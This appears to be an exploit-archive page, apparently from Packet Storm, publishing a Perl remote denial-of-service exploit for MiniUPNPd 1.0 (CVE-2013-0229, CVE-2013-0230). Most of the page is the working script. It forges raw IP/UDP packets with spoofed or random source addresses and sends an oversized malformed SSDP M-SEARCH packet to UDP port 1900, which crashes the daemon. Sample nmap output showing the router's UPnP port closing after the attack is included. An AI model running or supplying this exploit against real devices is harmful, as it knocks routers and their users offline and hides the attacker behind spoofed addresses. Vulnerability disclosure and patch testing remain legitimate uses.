exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

MiniUPNPd 1.0 Remote Denial Of Service

MiniUPNPd 1.0 Remote Denial Of Service
Posted Jul 8, 2015
Authored by Todor Donev

MiniUPNPd version 1.0 remote denial of service exploit.

tags | exploit, remote, denial of service
advisories | CVE-2013-0229, CVE-2013-0230
SHA-256 | ec5af0b0817b8cabdfaec4fbe7d5121d205649e7588521b0ad1d8d6592bbe575

MiniUPNPd 1.0 Remote Denial Of Service

Change Mirror Download
#!/usr/bin/perl
#
# miniupnpd/1.0 remote denial of service exploit
#
# Copyright 2015 (c) Todor Donev
# todor.donev@gmail.com
# http://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# The SSDP protocol can discover Plug & Play devices,
# with uPnP (Universal Plug and Play). SSDP is HTTP
# like protocol and work with NOTIFY and M-SEARCH
# methods.
#
# See also:
# CVE-2013-0229
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0229
# CVE-2013-0230
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0230
#
# Tested on
# Device Name : IMW-C920W
# Device Manufacturer : INFOMARK (http://infomark.co.kr)
#
# These devices are commonly used by Max Telecom, Bulgaria
#
# Disclaimer:
# This or previous program is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use at your own risk!
#
# See also:
# SSDP Reflection DDoS Attacks
# http://tinyurl.com/mqwj6xt
#
#######################################
#
# # perl miniupnpd.pl
#
# [ miniupnpd/1.0 remote denial of service exploit ]
# [ =============================================== ]
# [ Usage:
# [ ./miniupnpd.pl <victim address> <spoofed address>
# [ Example:
# [ perl miniupnpd.pl 192.168.1.1 133.73.13.37
# [ Example:
# [ perl miniupnpd.pl 192.168.1.1
# [ =============================================== ]
# [ 2015 <todor.donev@gmail.com> Todor Donev 2015 ]
#
# # nmap -sU 192.168.1.1 -p1900 --script=upnp-info
#
# Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST
# Nmap scan report for 192.168.1.1
# Host is up (0.00078s latency).
# PORT STATE SERVICE
# 1900/udp open upnp
# | upnp-info:
# | 192.168.1.1
# | Server: 1.0 UPnP/1.0 miniupnpd/1.0
# | Location: http://192.168.1.1:5000/rootDesc.xml
# | Webserver: 1.0 UPnP/1.0 miniupnpd/1.0
# | Name: INFOMARK Router
# | Manufacturer: INFOMARK
# | Model Descr: INFOMARK Router
# | Model Name: INFOMARK Router
# | Model Version: 1
# | Name: WANDevice
# | Manufacturer: MiniUPnP
# | Model Descr: WAN Device
# | Model Name: WAN Device
# | Model Version: 20070228
# | Name: WANConnectionDevice
# | Manufacturer: MiniUPnP
# | Model Descr: MiniUPnP daemon
# | Model Name: MiniUPnPd
# |_ Model Version: 20070228
# MAC Address: 00:00:00:00:00:00 (Infomark Co.) // CENSORED
#
# Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
#
# # perl miniupnpd.pl 192.168.1.1
#
# [ miniupnpd/1.0 remote denial of service exploit ]
# [ =============================================== ]
# [ Target: 192.168.1.1
# [ Send malformed SSDP packet..
#
# # nmap -sU 192.168.1.1 -p1900
#
# Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST
# Nmap scan report for 192.168.1.1
# Host is up (0.00085s latency).
# PORT STATE SERVICE
# 1900/udp closed upnp // GOOD NIGHT, SWEET PRINCE.... :D
# MAC Address: 00:00:00:00:00:00 (Infomark Co.) // CENSORED
#
# Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds
#
#
# Special thanks to HD Moore ..
#

use Socket;

if ( $< != 0 ) {
print "Sorry, must be run as root!\n";
print "This script use RAW Socket.\n";
exit;
}

my $ip_src = (gethostbyname($ARGV[1]))[4];
my $ip_dst = (gethostbyname($ARGV[0]))[4];

print "\n[ miniupnpd/1.0 remote denial of service exploit ]\n";
print "[ =============================================== ]\n";
select(undef, undef, undef, 0.40);

if (!defined $ip_dst) {
print "[ Usage:\n[ ./$0 <victim address> <spoofed address>\n";
select(undef, undef, undef, 0.55);
print "[ Example:\n[ perl $0 192.168.1.1 133.73.13.37\n";
print "[ Example:\n[ perl $0 192.168.1.1\n";
print "[ =============================================== ]\n";
print "[ 2015 <todor.donev\@gmail.com> Todor Donev 2015 ]\n\n";
exit;
}
socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;
setsockopt(RAW, 0, 1, 1) or die $!;
main();

# Main program
sub main {
my $packet;

$packet = iphdr();
$packet .= udphdr();
$packet .= payload();
# b000000m...
send_packet($packet);
}

# IP header (Layer 3)
sub iphdr {
my $ip_ver = 4; # IP Version 4 (4 bits)
my $iphdr_len = 5; # IP Header Length (4 bits)
my $ip_tos = 0; # Differentiated Services (8 bits)
my $ip_total_len = $iphdr_len + 20; # IP Header Length + Data (16 bits)
my $ip_frag_id = 0; # Identification Field (16 bits)
my $ip_frag_flag = 000; # IP Frag Flags (R DF MF) (3 bits)
my $ip_frag_offset = 0000000000000; # IP Fragment Offset (13 bits)
my $ip_ttl = 255; # IP TTL (8 bits)
my $ip_proto = 17; # IP Protocol (8 bits)
my $ip_checksum = 0; # IP Checksum (16 bits)
my $ip_src=gethostbyname(&randip) if !$ip_src; # IP Source (32 bits)
# IP Packet construction
my $iphdr = pack(
'H2 H2 n n B16 h2 c n a4 a4',
$ip_ver . $iphdr_len, $ip_tos, $ip_total_len,
$ip_frag_id, $ip_frag_flag . $ip_frag_offset,
$ip_ttl, $ip_proto, $ip_checksum,
$ip_src, $ip_dst
);

return $iphdr;
}

# UDP header (Layer 4)
sub udphdr {
my $udp_src_port = 31337; # UDP Sort Port (16 bits) (0-65535)
my $udp_dst_port = 1900; # UDP Dest Port (16 btis) (0-65535)
my $udp_len = 8 + length(payload()); # UDP Length (16 bits) (0-65535)
my $udp_checksum = 0; # UDP Checksum (16 bits) (XOR of header)

# UDP Packet
my $udphdr = pack(
'n n n n',
$udp_src_port, $udp_dst_port,
$udp_len, $udp_checksum
);
return $udphdr;
}

# Create SSDP Bomb
sub payload {
my $data;
my $head;
$data = "M-SEARCH * HTTP\/1.1\\r\\n";
for (0..1260) { $data .= chr( int(rand(25) + 65) ); }
my $payload = pack('a' . length($data), $data);
return $payload;
}

# Generate random source ip address
sub randip () {
srand(time() ^ ($$ + ($$ << 15)));
my $ipdata;
$ipdata = join ('.', (int(rand(255)), int(rand(255)), int(rand(255)), int(rand(255)))), "\n";
my $ipsrc = pack('A' . length($ipdata), rand($ipdata));
return $ipdata;
}

# Send the malformed packet
sub send_packet {
print "[ Target: $ARGV[0]\n";
select(undef, undef, undef, 0.30);
print "[ Send malformed SSDP packet..\n\n";
send(RAW, $_[0], 0, pack('Sna4x8', PF_INET, 60, $ip_dst)) or die $!;
}


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close